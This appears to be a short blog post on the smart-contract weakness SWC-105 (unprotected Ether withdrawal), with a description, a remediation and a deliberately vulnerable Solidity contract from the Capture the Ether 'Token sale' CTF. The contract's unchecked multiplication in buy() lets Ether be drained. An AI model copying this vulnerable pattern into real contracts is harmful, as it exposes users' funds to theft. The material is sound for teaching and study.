05.SWC-105_Unprotected Ether Withdrawal
2023-07-13 16:10:50 # 09.SWC

SWC-105_Unprotected Ether Withdrawal

Unprotected Ether Withdrawal

  • Description: Due to missing or insufficient access controls, malicious parties can withdraw some or all Ether from the contract account.

    This bug is sometimes caused by unintentionally exposing initialization functions. By wrongly naming a function intended to be a constructor, the constructor code ends up in the runtime byte code and can be called by anyone to re-initialize the contract.

  • Remediation: Implement controls so withdrawals can only be triggered by authorized parties or according to the specs of the smart contract system.

vulnerability contract 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pragma solidity ^0.4.21;
// capturetheether ctf: https://www.levi104.com/2023/06/23/01.Capturetheether%20CTF/07.Token%20sale/
contract TokenSaleChallenge {
    mapping(address => uint256) public balanceOf;
    uint256 constant PRICE_PER_TOKEN = 1 ether;

    function TokenSaleChallenge(address _player) public payable {
        require(msg.value == 1 ether);
    }

    function isComplete() public view returns (bool) {
        return address(this).balance < 1 ether;
    }

    function buy(uint256 numTokens) public payable {
        require(msg.value == numTokens * PRICE_PER_TOKEN);

        balanceOf[msg.sender] += numTokens;
    }

    function sell(uint256 numTokens) public {
        require(balanceOf[msg.sender] >= numTokens);

        balanceOf[msg.sender] -= numTokens;
        msg.sender.transfer(numTokens * PRICE_PER_TOKEN);
    }
}

vulnerability contract …………

Prev
2023-07-13 16:10:50 # 09.SWC
Next